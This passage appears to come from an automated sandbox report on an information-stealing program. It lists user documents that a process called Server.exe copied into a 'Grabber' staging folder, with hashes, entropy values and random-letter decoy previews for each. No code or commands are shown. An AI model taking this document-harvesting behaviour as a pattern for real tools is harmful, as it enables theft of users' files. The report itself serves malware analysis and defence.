SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Reputation:	unknown
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\WUTJSCBCFX.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Reputation:	unknown
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Reputation:	unknown
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG\KATAXZVCPS.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Reputation:	unknown
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG\ONBQCLYSPU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG\UMMBDNEQBN.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG\VLZDGUKUTZ.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Reputation:	unknown
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	402
Entropy (8bit):	3.493087299556618
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
MD5:	ECF88F261853FE08D58E2E903220DA14
SHA1:	F72807A9E081906654AE196605E681D5938A2E6C
SHA-256:	CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
SHA-512:	82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
Malicious:	false
Reputation:	unknown
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\HTAGVDFUIE.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDH